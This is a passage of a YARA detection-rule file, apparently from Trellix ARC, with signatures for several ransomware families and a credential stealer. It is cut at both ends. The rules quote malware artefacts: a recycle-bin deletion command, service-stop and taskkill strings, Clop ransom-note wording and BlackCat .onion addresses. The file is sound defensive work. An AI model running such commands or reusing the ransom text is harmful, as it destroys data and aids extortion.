66 89 04 5E 43 3B DF 72 E4 56 E8 ?? ?? ?? ?? 3B F8 8B 45 08 59 77 C4 8B C6 5B EB 02 33 C0 5F 5E 8B E5 5D C3 } + $sq8 = { 55 8B EC 81 EC 50 02 00 00 53 56 57 6A 0A E8 ?? ?? ?? ?? 59 33 DB 6A 2E 5E 39 5D 14 0F 84 13 01 00 00 FF 75 08 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 59 59 85 F6 0F 84 F7 00 00 00 53 53 68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 8D 8D B0 FD FF FF 51 56 FF D0 8B D8 83 FB FF 0F 84 CC 00 00 00 F6 85 B0 FD FF FF 10 0F 84 97 00 00 00 83 7D 1C 00 74 2E 8D 85 DC FD FF FF 68 ?? ?? ?? ?? 50 E8 0A ?? ?? ?? 59 59 85 C0 75 7A 8D 85 DC FD FF FF 68 ?? ?? ?? ?? 50 E8 F3 ?? ?? ?? 59 59 85 C0 75 63 8D 85 DC FD FF FF 50 E8 ?? ?? ?? ?? 59 83 F8 03 73 0C 6A 2E 58 66 39 85 DC FD FF FF 74 45 8D 85 DC FD FF FF 50 FF 75 08 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 0C 89 45 14 85 C0 74 27 6A 01 6A 00 6A 01 FF 75 10 FF 75 0C 50 E8 14 FF FF FF FF 75 14 8B F8 E8 ?? ?? ?? ?? 83 C4 1C 85 FF 0F 85 EE 00 00 00 33 C0 50 50 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 8D B0 FD FF FF 51 53 FF D0 85 C0 0F 85 3B FF FF FF 53 E8 ?? ?? ?? ?? 59 56 E8 ?? ?? ?? ?? 59 33 DB 6A 2E 5E FF 75 0C FF 75 08 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 83 C4 0C 85 FF 0F 84 CF 00 00 00 53 53 68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 8D 8D B0 FD FF FF 51 57 FF D0 8B D8 83 FB FF 0F 84 A6 00 00 00 8D 85 DC FD FF FF 50 E8 ?? ?? ?? ?? 59 83 F8 03 73 09 66 39 B5 DC FD FF FF 74 3E 83 BD B0 FD FF FF 10 75 06 83 7D 18 00 74 2F 8D 85 DC FD FF FF 50 FF 75 08 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 83 C4 0C 85 F6 74 12 83 7D 10 00 74 40 56 FF 55 10 56 E8 ?? ?? ?? ?? 59 59 33 C0 50 50 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 8D B0 FD FF FF 51 53 FF D0 85 C0 74 29 6A 2E 5E EB 85 56 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 59 59 8B C7 EB 22 57 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 59 59 8B C6 EB 10 53 E8 ?? ?? ?? ?? 59 57 E8 ?? ?? ?? ?? 59 33 C0 5F 5E 5B 8B E5 5D C3 } + $sq9 = { 83 3D 14 ?? ?? ?? ?? 56 74 0A 8B 35 20 ?? ?? ?? 85 F6 75 66 53 57 BB E0 01 00 00 33 FF 53 89 3D 14 ?? ?? ?? E8 F0 F8 FF FF 33 F6 A3 14 ?? ?? ?? 46 59 85 C0 74 12 6A 78 57 50 89 35 20 ?? ?? ?? E8 A6 F8 FF FF 83 C4 0C 53 89 3D 18 ?? ?? ?? E8 C5 F8 FF FF A3 18 ?? ?? ?? 59 85 C0 74 14 6A 78 57 50 89 35 20 ?? ?? ?? E8 7E F8 FF FF 83 C4 0C EB 06 8B 35 20 ?? ?? ?? 5F 5B 8B C6 5E C3 } + $sq10 = { 55 8B EC 51 51 83 65 FC 00 53 56 57 64 A1 30 00 00 00 89 45 FC 8B 45 FC 8B 40 0C 8B 58 0C 8B F3 8B 46 18 FF 76 28 89 45 F8 E8 CE FA FF FF 8B F8 59 85 FF 74 1F 6A 00 57 E8 32 01 00 00 57 E8 ?? ?? ?? ?? 03 C0 50 57 E8 71 FA FF FF 83 C4 14 39 45 08 74 11 8B 36 3B DE 75 C6 33 C0 5F 5E 5B 8B E5 5D C2 04 00 8B 45 F8 EB F2 } + $sq11 = { A1 ?? ?? ?? ?? 85 C0 74 07 50 E8 ?? ?? ?? ?? 59 A1 ?? ?? ?? ?? 85 C0 74 07 50 E8 ?? ?? ?? ?? 59 A1 ?? ?? ?? ?? 85 C0 74 07 50 E8 ?? ?? ?? ?? 59 33 C0 A3 ?? ?? ?? ?? A3 ?? ?? ?? ?? A3 ?? ?? ?? ?? C3 } + $sq12 = { 55 8B EC 56 8B 75 0C 57 85 F6 74 48 56 E8 ?? ?? ?? ?? 59 85 C0 74 3D 56 E8 ?? ?? ?? ?? 59 85 C0 74 32 83 65 0C 00 8D 45 0C 6A 01 50 56 E8 ?? ?? ?? ?? 8B F8 83 C4 0C 85 FF 74 19 8B 45 0C 85 C0 74 12 83 7D 14 00 74 12 39 45 14 73 0D 57 E8 ?? ?? ?? ?? 59 33 C0 5F 5E 5D C3 83 7D 10 00 74 1A 6A 00 6A 01 56 E8 ?? ?? ?? ?? 59 50 FF 75 08 E8 1F 00 00 00 8B 45 0C 83 C4 10 50 57 FF 75 08 E8 FF FE FF FF 57 8B F0 E8 ?? ?? ?? ?? 83 C4 10 8B C6 EB C3 } + $sq13 = { 55 8B EC 83 EC 18 56 FF 75 08 E8 ?? ?? ?? ?? 50 89 45 F0 E8 ?? ?? ?? ?? 8B F0 59 59 85 F6 0F 84 C0 00 00 00 53 8B 5D 0C 33 C9 57 6A 04 5A 8B C3 F7 E2 0F 90 C1 F7 D9 0B C8 51 E8 ?? ?? ?? ?? 83 65 F4 00 8B F8 83 65 FC 00 59 85 DB 74 6D 8B 45 10 83 C0 FC FF 75 F0 83 C0 04 89 45 E8 6A 00 56 8B 00 89 45 EC E8 ?? ?? ?? ?? FF 75 F0 FF 75 08 56 E8 ?? ?? ?? ?? 83 65 F8 00 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 20 EB 1F FF 75 EC 50 E8 ?? ?? ?? ?? 59 59 85 C0 75 32 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? FF 45 F8 59 59 85 C0 75 DD 8B 45 FC 40 89 45 FC 3B C3 8B 45 E8 72 99 56 E8 ?? ?? ?? ?? 59 39 5D F4 75 12 8B C7 EB 17 8B 45 FC 8B 4D F8 FF 45 F4 89 0C 87 EB D7 57 E8 ?? ?? ?? ?? 59 33 C0 5F 5B 5E 8B E5 5D C3 } + $sq14 = { 55 8B EC 8B 45 0C 53 56 8B 75 08 57 8B 4E 04 03 C1 8D 3C 09 3B F8 77 06 8D B8 F4 01 00 00 33 C9 8B C7 6A 04 5A F7 E2 0F 90 C1 F7 D9 0B C8 51 E8 ?? ?? ?? ?? 8B D8 59 85 DB 74 26 57 6A 00 53 E8 ?? ?? ?? ?? FF 76 08 FF 36 53 E8 ?? ?? ?? ?? FF 36 E8 ?? ?? ?? ?? 33 C0 89 1E 83 C4 1C 89 7E 04 40 5F 5E 5B 5D C3 } + $sq15 = { 55 8B EC 83 7D 0C 00 57 74 39 8B 7D 10 85 FF 74 32 56 8B 75 08 8B 46 08 03 C7 3B 46 04 76 09 57 56 E8 3F FF FF FF 59 59 8B 46 08 03 06 57 FF 75 0C 50 E8 ?? ?? ?? ?? 01 7E 08 83 C4 0C 33 C0 40 5E EB 02 33 C0 5F 5D C3 } + + condition: + uint16(0)==0x5a4d and any of them +} +rule TRELLIX_ARC_STEALER_Emirates_Statement : STEALER +{ + meta: + description = "Credentials Stealing Attack" + author = "Christiaan Beek | McAfee ATR Team" + id = "b5a6d996-8a3d-5238-95af-bf5ff893bbc5" + date = "2013-06-30" + modified = "2020-08-14" + reference = "https://github.com/advanced-threat-research/Yara-Rules/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/stealer/STEALER_EmiratesStatement.yar#L1-L24" + license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" + hash = "7cf757e0943b0a6598795156c156cb90feb7d87d4a22c01044499c4e1619ac57" + logic_hash = "17eaddf375fc1875fb0275f8c0f93dfe921b452bdc6eb471adc155f749492328" + score = 75 + quality = 45 + tags = "STEALER" + rule_version = "v1" + malware_type = "stealer" + malware_family = "Stealer:W32/DarkSide" + actor_type = "Cybercrime" + actor_group = "Unknown" + + strings: + $string0 = "msn.klm" + $string1 = "wmsn.klm" + $string2 = "bms.klm" + + condition: + all of them +} +import "pe" + +rule TRELLIX_ARC_Samsamransom2016 : RANSOMWARE FILE +{ + meta: + description = "No description has been set in the source file - Trellix ARC" + author = "Christiaan Beek | McAfee ATR Team" + id = "1c7985d0-d01c-52f7-8819-e038ccc01212" + date = "2018-01-25" + modified = "2020-08-14" + reference = "https://github.com/advanced-threat-research/Yara-Rules/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_SamSam.yar#L3-L52" + license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" + logic_hash = "9e8034ec0ded82ad82b625d6d1b9918761decef0fd42a253722cdc620b355e1a" + score = 75 + quality = 68 + tags = "RANSOMWARE, FILE" + rule_version = "v1" + malware_type = "ransomware" + malware_family = "Ransom:W32/SamSam" + actor_type = "Cybercrime" + actor_group = "Unknown" + hash1 = "45e00fe90c8aa8578fce2b305840e368d62578c77e352974da6b8f8bc895d75b" + + strings: + $x1 = "Could not list processes locking resource. Failed to get size of result." fullword wide + $s2 = "Could not list processes locking resource." fullword wide + $s3 = "samsam.del.exe" fullword ascii + $s4 = "samsam.exe" fullword wide + $s5 = "RM_UNIQUE_PROCESS" fullword ascii + $s6 = "KillProcessWithWait" fullword ascii + $s7 = "killOpenedProcessTree" fullword ascii + $s8 = "RM_PROCESS_INFO" fullword ascii + $s9 = "Exception caught in process: {0}" fullword wide + $s10 = "Could not begin restart session. Unable to determine file locker." fullword wide + $s11 = "samsam.Properties.Resources.resources" fullword ascii + $s12 = "EncryptStringToBytes" fullword ascii + $s13 = "recursivegetfiles" fullword ascii + $s14 = "RSAEncryptBytes" fullword ascii + $s15 = "encryptFile" fullword ascii + $s16 = "samsam.Properties.Resources" fullword wide + $s17 = "TSSessionId" fullword ascii + $s18 = "Could not register resource." fullword wide + $s19 = "<recursivegetfiles>b__0" fullword ascii + $s20 = "create_from_resource" fullword ascii + $op0 = { 96 00 e0 00 29 00 0b 00 34 23 } + $op1 = { 96 00 12 04 f9 00 34 00 6c 2c } + $op2 = { 72 a5 0a 00 70 a2 06 20 94 } + + condition: + ( uint16(0)==0x5a4d and filesize <700KB and pe.imphash()=="f34d5f2d4577ed6d9ceec516c1f5a744" and (1 of ($x*) and 4 of them ) and all of ($op*)) or ( all of them ) +} +import "pe" + +rule TRELLIX_ARC_Samsam_Ransomware_Latest : RANSOMWARE FILE +{ + meta: + description = "Latest SamSA ransomware samples" + author = "Christiaan Beek" + id = "716b9282-013e-5194-8518-2fa1a4007095" + date = "2018-01-23" + modified = "2020-08-14" + reference = "http://blog.talosintelligence.com/2018/01/samsam-evolution-continues-netting-over.html" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_SamSam.yar#L54-L105" + license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" + hash = "88e344977bf6451e15fe202d65471a5f75d22370050fe6ba4dfa2c2d0fae7828" + logic_hash = "06703479795fdef64813471f11b275df544c90d5bcece4817d415cd504d7b317" + score = 50 + quality = 68 + tags = "RANSOMWARE, FILE" + rule_version = "v1" + malware_type = "ransomware" + malware_family = "Ransom:W32/SamSam" + actor_type = "Cybercrime" + actor_group = "Unknown" + + strings: + $s1 = "bedf08175d319a2f879fe720032d11e5" fullword wide + $s2 = "ksdghksdghkddgdfgdfgfd" fullword ascii + $s3 = "osieyrgvbsgnhkflkstesadfakdhaksjfgyjqqwgjrwgehjgfdjgdffg" fullword ascii + $s4 = "5c2d376c976669efaf9cb107f5a83d0c" fullword wide + $s5 = "B917754BCFE717EB4F7CE04A5B11A6351EEC5015" fullword ascii + $s6 = "f99e47c1d4ccb2b103f5f730f8eb598a" fullword wide + $s7 = "d2db284217a6e5596913e2e1a5b2672f" fullword wide + $s8 = "0bddb8acd38f6da118f47243af48d8af" fullword wide + $s9 = "f73623dcb4f62b0e5b9b4d83e1ee4323" fullword wide + $s10 = "916ab48e32e904b8e1b87b7e3ced6d55" fullword wide + $s11 = "c6e61622dc51e17195e4df6e359218a2" fullword wide + $s12 = "2a9e8d549af13031f6bf7807242ce27f" fullword wide + $s13 = "e3208957ad76d2f2e249276410744b29" fullword wide + $s14 = "b4d28bbd65da97431f494dd7741bee70" fullword wide + $s15 = "81ee346489c272f456f2b17d96365c34" fullword wide + $s16 = "94682debc6f156b7e90e0d6dc772734d" fullword wide + $s17 = "6943e17a989f11af750ea0441a713b89" fullword wide + $s18 = "b1c7e24b315ff9c73a9a89afac5286be" fullword wide + $s19 = "90928fd1250435589cc0150849bc0cff" fullword wide + $s20 = "67da807268764a7badc4904df351932e" fullword wide + $op0 = { 30 01 00 2b 68 79 33 38 68 34 77 65 36 34 74 72 } + $op1 = { 01 00 b2 04 00 00 01 00 84 } + $op2 = { 68 09 00 00 38 66 00 00 23 55 53 00 a0 6f 00 00 } + + condition: + ( uint16(0)==0x5a4d and filesize <100KB and pe.imphash()=="f34d5f2d4577ed6d9ceec516c1f5a744" and (8 of them ) and all of ($op*)) or ( all of them ) +} +rule TRELLIX_ARC_Crime_Ransomware_Windows_Gpgqwerty : RANSOMWARE +{ + meta: + description = "Detect GPGQwerty ransomware" + author = "McAfee Labs" + id = "dcbaf3bd-7d0c-5449-a751-82caaad3b5c2" + date = "2018-03-21" + modified = "2020-08-14" + reference = "https://securingtomorrow.mcafee.com/mcafee-labs/ransomware-takes-open-source-path-encrypts-gnu-privacy-guard/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_GPGQwerty.yar#L1-L26" + license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" + logic_hash = "8e77895cb8e7f33707c5080780a49cb4bf1d35aa7a8df829fdc7a93319ce3897" + score = 75 + quality = 70 + tags = "RANSOMWARE" + rule_version = "v1" + malware_type = "ransomware" + malware_family = "Ransom:W32/GPGQwerty" + actor_type = "Cybercrime" + actor_group = "Unknown" + + strings: + $a = "gpg.exe –recipient qwerty -o" + $b = "%s%s.%d.qwerty" + $c = "del /Q /F /S %s$recycle.bin" + $d = "cryz1@protonmail.com" + + condition: + all of them +} +rule TRELLIX_ARC_Robbinhood_Ransomware : RANSOMWARE FILE +{ + meta: + description = "Robbinhood GoLang ransowmare" + author = "Christiaan Beek | McAfee ATR" + id = "b2654d00-330e-511e-b8f1-75aa7b57d040" + date = "2019-05-10" + modified = "2020-08-14" + reference = "https://github.com/advanced-threat-research/Yara-Rules/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_RobbinHood.yar#L1-L37" + license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" + hash = "9977ba861016edef0c3fb38517a8a68dbf7d3c17de07266cfa515b750b0d249e" + logic_hash = "19a1b7d92bc49dee6da3fb4c053b118e6475aeca43e891d46470c2c09c148038" + score = 75 + quality = 70 + tags = "RANSOMWARE, FILE" + rule_version = "v1" + malware_type = "ransomware" + malware_family = "Ransom:W32/Robbinhood" + actor_type = "Cybercrime" + actor_group = "Unknown" + + strings: + $s1 = ".enc_robbinhood" nocase + $s2 = "sc.exe stop SQLAgent$SQLEXPRESS" nocase + $s3 = "pub.key" nocase + $s4 = "main.EnableShadowFucks" nocase + $s5 = "main.EnableRecoveryFCK" nocase + $s6 = "main.EnableLogLaunders" nocase + $s7 = "main.EnableServiceFuck" nocase + $op0 = { 8d 05 2d 98 51 00 89 44 24 30 c7 44 24 34 1d } + $op1 = { 8b 5f 10 01 c3 8b 47 04 81 c3 b5 bc b0 34 8b 4f } + $op2 = { 0f b6 34 18 8d 7e d0 97 80 f8 09 97 77 39 81 fd } + + condition: + ( uint16(0)==0x5a4d and filesize <3000KB and (1 of ($s*)) and all of ($op*)) or ( all of them ) +} +rule TRELLIX_ARC_Clop_Ransom_Note : RANSOMWARE FILE +{ + meta: + description = "Rule to detect Clop Ransomware Note" + author = "Marc Rivero | McAfee ATR Team" + id = "b18e4d4d-aa38-5009-a31b-ed038c5bd4f9" + date = "2019-08-01" + modified = "2020-08-14" + reference = "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/clop-ransomware/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_ClopRansomNote.yar#L1-L34" + license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" + logic_hash = "a90862e9dc59b1a8f38b777b4f529d5de740d0f49175813cae64f10ca9677826" + score = 75 + quality = 70 + tags = "RANSOMWARE, FILE" + rule_version = "v1" + malware_type = "ransomware" + malware_family = "Ransom:W32/Clop" + actor_type = "Cybercrime" + actor_group = "Unknown" + + strings: + $s1 = "If you want to restore your files write to emails" fullword ascii + $s2 = "All files on each host in the network have been encrypted with a strong algorithm." fullword ascii + $s3 = "Shadow copies also removed, so F8 or any other methods may damage encrypted data but not recover." fullword ascii + $s4 = "You will receive decrypted samples and our conditions how to get the decoder." fullword ascii + $s5 = "DO NOT RENAME OR MOVE the encrypted and readme files." fullword ascii + $s6 = "(Less than 6 Mb each, non-archived and your files should not contain valuable information" fullword ascii + $s7 = "We exclusively have decryption software for your situation" fullword ascii + $s8 = "Do not rename encrypted files." fullword ascii + $s9 = "DO NOT DELETE readme files." fullword ascii + $s10 = "Nothing personal just business" fullword ascii + $s11 = "eqaltech.su" fullword ascii + + condition: + ( uint16(0)==0x6f59) and filesize <10KB and all of them +} +rule TRELLIX_ARC_RANSOM_Makop : RANSOMWARE FILE +{ + meta: + description = "Rule to detect the unpacked Makop ransomware samples" + author = "Marc Rivero | McAfee ATR Team" + id = "2828f2f9-4702-5cef-8b4e-7e98146c0332" + date = "2020-07-19" + modified = "2020-08-14" + reference = "https://github.com/advanced-threat-research/Yara-Rules/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_makop.yar#L1-L32" + license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" + hash = "008e4c327875110b96deef1dd8ef65cefa201fef60ca1cbb9ab51b5304e66fe1" + logic_hash = "2b4f8b90d46530421b66dbb04df6e84d268709fbee884536d8acc91e1b85f8a4" + score = 75 + quality = 70 + tags = "RANSOMWARE, FILE" + rule_version = "v1" + malware_type = "ransomware" + malware_family = "Ransom:W32/Makop" + actor_type = "Cybercrime" + actor_group = "Unknown" + + strings: + $pattern_0 = { 50 8d7c2420 e8???????? 84c0 0f84a6020000 8b742460 ba???????? } + $pattern_1 = { 51 52 53 ffd5 85c0 746d 8b4c240c } + $pattern_2 = { 7521 68000000f0 6a18 6a00 6a00 56 ff15???????? } + $pattern_3 = { 83c40c 8d4e0c 51 66c7060802 66c746041066 c6460820 } + $pattern_4 = { 51 ffd3 50 ffd7 8b4628 85c0 } + $pattern_5 = { 85c9 741e 8b4508 8b4d0c 8a11 } + $pattern_6 = { 83c002 6685c9 75f5 2bc6 d1f8 66390c46 8d3446 } + $pattern_7 = { 895a2c 8b7f04 85ff 0f85f7feffff 55 6a00 } + $pattern_8 = { 8b3d???????? 6a01 6a00 ffd7 50 ff15???????? } + $pattern_9 = { 85c0 7407 50 ff15???????? } + + condition: + 7 of them and filesize <237568 +} +rule TRELLIX_ARC_Pico_Ransomware : RANSOMWARE FILE +{ + meta: + description = "Rule to detect Pico Ransomware" + author = "Marc Rivero | McAfee ATR Team" + id = "843cac7a-652e-5cbf-a09d-fb4b1eaa8481" + date = "2018-08-30" + modified = "2020-08-14" + reference = "https://twitter.com/siri_urz/status/1035138577934557184" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_Pico.yar#L1-L37" + license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" + hash = "cc4a9e410d38a29d0b6c19e79223b270e3a1c326b79c03bec73840b37778bc06" + logic_hash = "bb15e66504f393bcb4b173cb2a4ec65aa13110060f7fb70282330b5f6d72f5ed" + score = 75 + quality = 20 + tags = "RANSOMWARE, FILE" + rule_version = "v1" + malware_type = "ransomware" + malware_family = "Ransom:W32/Pico" + actor_type = "Cybercrime" + actor_group = "Unknown" + + strings: + $s1 = "C:\\Users\\rikfe\\Desktop\\Ransomware\\ThanatosSource\\Release\\Ransomware.pdb" fullword ascii + $s2 = "\\Downloads\\README.txt" fullword ascii + $s3 = "\\Music\\README.txt" fullword ascii + $s4 = "\\Videos\\README.txt" fullword ascii + $s5 = "\\Pictures\\README.txt" fullword ascii + $s6 = "\\Desktop\\README.txt" fullword ascii + $s7 = "\\Documents\\README.txt" fullword ascii + $s8 = "/c taskkill /im " fullword ascii + $s9 = "\\AppData\\Roaming\\" fullword ascii + $s10 = "gMozilla/5.0 (Windows NT 6.1) Thanatos/1.1" fullword wide + $s11 = "AppData\\Roaming" fullword ascii + $s12 = "\\Downloads" fullword ascii + $s13 = "operator co_await" fullword ascii + + condition: + ( uint16(0)==0x5a4d and filesize <700KB) and all of them +} +rule TRELLIX_ARC_Ransom_Win_Blackcat : RANSOMWARE FILE +{ + meta: + description = "Detecting variants of Windows BlackCat malware" + author = " Trellix ATR" + id = "65483ffb-6b10-5fd5-8a5f-fc885a5f2e98" + date = "2022-01-06" + modified = "2022-01-19" + reference = "https://github.com/advanced-threat-research/Yara-Rules/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/Ransom_Win_BlackCat_public.yar#L2-L24" + license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" + logic_hash = "8faad28ab26690221f6e2130c886446615dbd505f76490cfaf999d130d0de6e3" + score = 75 + quality = 70 + tags = "RANSOMWARE, FILE" + malware_type = "Ransomware" + detection_name = "Ransom_Win_BlackCat" + actor_group = "Unknown" + + strings: + $URL1 = "zujgzbu5y64xbmvc42addp4lxkoosb4tslf5mehnh7pvqjpwxn5gokyd.onion" ascii wide + $URL2 = "mu75ltv3lxd24dbyu6gtvmnwybecigs5auki7fces437xvvflzva2nqd.onion" ascii wide + $API = { 3a 7c d8 3f } + + condition: + uint16(0)==0x5a4d and filesize <3500KB and 1 of ($URL*) and $API +} +rule TRELLIX_ARC_RANSOM_Exorcist : RANSOMWARE FILE +{ + meta: + description = "Rule to detect Exorcist" + author = "McAfee ATR Team" + id = "38ab069d-b030-5459-a42f-7ecd5963e68f" + date = "2020-09-01" + modified = "2020-10-12" + reference = "https://github.com/advanced-threat-research/Yara-Rules/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_Exorcist.yar#L1-L25" + license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" + logic_hash = "c376382e60aae0f661151495097d3d93f185faebb11781dbf083324c23a07247" + score = 75 + quality = 70 + tags = "RANSOMWARE, FILE" + rule_version = "v1" + malware_type = "ransomware" + malware_family = "Ransomware:W32/Exorcist" + actor_type = "Cybercrime" + hash1 = "793dcc731fa2c6f7406fd52c7ac43926ac23e39badce09677128cce0192e19b0" + actor_type = "Cybercrime" + actor_group = "Unknown" + + strings: + $sq1 = { 48 8B C4 48 89 58 08 48 89 70 10 48 89 78 18 4C 89 60 20 55 41 56 41 57 48 8D 68 A1 48 81 EC 90 00 00 00 49 8B F1 49 8B F8 4C 8B FA 48 8B D9 E8 ?? ?? ?? ?? 45 33 E4 85 C0 0F 85 B1 00 00 00 48 8B D7 48 8B CB E8 9E 02 00 00 85 C0 0F 85 9E 00 00 00 33 D2 48 8B CB E8 ?? ?? ?? ?? 45 33 C0 48 8D 15 ?? ?? ?? ?? 48 8B CB E8 ?? ?? ?? ?? 45 8D 44 24 01 48 8B D7 48 8B C8 E8 ?? ?? ?? ?? 48 8B D0 48 8B CB 48 8B F8 FF 15 ?? ?? ?? ?? 4C 89 64 24 30 45 33 C9 C7 44 24 28 80 00 00 E8 45 33 C0 BA 00 00 00 C0 C7 44 24 20 03 00 00 00 48 8B CF FF 15 ?? ?? ?? ?? 4C 8B F0 48 8D 48 FF 48 83 F9 FD 77 25 48 8D 55 2F 48 8B C8 FF 15 ?? ?? ?? ?? 4C 39 65 2F 75 3B 49 8B CE FF 15 ?? ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ?? 48 8B CF E8 ?? ?? ?? ?? 4C 8D 9C 24 90 00 00 00 49 8B 5B 20 49 8B 73 28 49 8B 7B 30 4D 8B 63 38 49 8B E3 41 5F 41 5E 5D C3 48 8D 45 FB 4C 89 65 1F 4C 8D 4D FF 48 89 44 24 20 4C 8B C6 4C 89 65 07 48 8D 55 07 4C 89 65 FF 48 8D 4D 1F 44 89 65 FB E8 ?? ?? ?? ?? 45 33 C9 4C 8D 05 3C F5 FF FF 49 8B D7 49 8B CE FF 15 ?? ?? ?? ?? 48 8D 55 17 49 8B CE FF 15 ?? ?? ?? ?? 49 8B CE 44 89 65 F7 E8 ?? ?? ?? ?? 49 8B F4 4C 89 65 0F 4C 39 65 17 0F 8E 9D 00 00 00 C1 E0 10 44 8B F8 F0 FF 45 F7 B9 50 00 00 00 E8 ?? ?? ?? ?? 8B 4D 13 48 8B D8 89 48 14 89 70 10 4C 89 60 18 44 89 60 28 4C 89 70 30 48 8B 4D 07 48 89 48 48 48 8D 45 F7 B9 00 00 01 00 48 89 43 40 E8 ?? ?? ?? ?? 33 D2 48 89 43 20 41 B8 00 00 01 00 48 8B C8 E8 ?? ?? ?? ?? 48 8B 53 20 4C 8D 4B 38 41 B8 00 00 01 00 48 89 5C 24 20 49 8B CE FF 15 ?? ?? ?? ?? EB 08 33 C9 FF 15 ?? ?? ?? ?? 8B 45 F7 3D E8 03 00 00 77 EE 49 03 F7 48 89 75 0F 48 3B 75 17 0F 8C 6B FF FF FF EB 03 8B 45 F7 85 C0 74 0E 33 C9 FF 15 ?? ?? ?? ?? 44 39 65 F7 77 F2 48 8B 4D 07 E8 ?? ?? ?? ?? 48 8B 4D 1F 33 D2 E8 ?? ?? ?? ?? 49 8B CE FF 15 ?? ?? ?? ?? 4C 89 64 24 30 45 33 C9 C7 44 24 28 80 00 00 00 45 33 C0 BA 00 00 00 C0 C7 44 24 20 03 00 00 00 48 8B CF FF 15 ?? ?? ?? ?? 48 8B D8 48 8D 48 FF 48 83 F9 FD 77 51 48 8D 55 37 48 8B C8 FF 15 ?? ?? ?? ?? 48 8B 55 37 45 33 C9 45 33 C0 48 8B CB FF 15 ?? ?? ?? ?? 44 8B 45 FB 4C 8D 4D 27 48 8B 55 FF 48 8B CB 4C 89 64 24 20 FF 15 ?? ?? ?? ?? 48 8B 4D FF E8 ?? ?? ?? ?? 48 8B CB FF 15 ?? ?? ?? ?? E9 14 FE FF FF 48 8B CF E8 ?? ?? ?? ?? 48 8B 4D FF E9 06 FE FF FF } + $sq2 = { 48 8B C4 48 81 EC 38 01 00 00 48 8D 50 08 C7 40 08 04 01 00 00 48 8D 4C 24 20 FF 15 ?? ?? ?? ?? 48 8D 4C 24 20 E8 ?? ?? ?? ?? 48 81 C4 38 01 00 00 C3 } + + condition: + uint16(0)==0x5a4d and any of them +} +rule TRELLIX_ARC_Kraken_Cryptor_Ransomware_Loader : RANSOMWARE FILE +{ + meta: + description = "Rule to detect the Kraken Cryptor Ransomware loader" + author = "Marc Rivero | McAfee ATR Team" + id = "e6bfa30b-6565-5d03-8f4d-96fc2b6a1c11" + date = "2018-09-30" + modified = "2020-08-14" + reference = "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/fallout-exploit-kit-releases-the-kraken-ransomware-on-its-victims/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_Kraken.yar#L1-L30" + license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" + hash = "564154a2e3647318ca40a5ffa68d06b1bd40b606cae1d15985e3d15097b512cd" + logic_hash = "9e252a3ba7f6bf861ea7563461a1420959dfb0f5b7c3f6071150d03422504539" + score = 75 + quality = 70 + tags = "RANSOMWARE, FILE" + rule_version = "v1" + malware_type = "ransomware" + malware_family = "Ransom:W32/Kraken" + actor_type = "Cybercrime" + actor_group = "Unknown" + + strings: + $pdb = 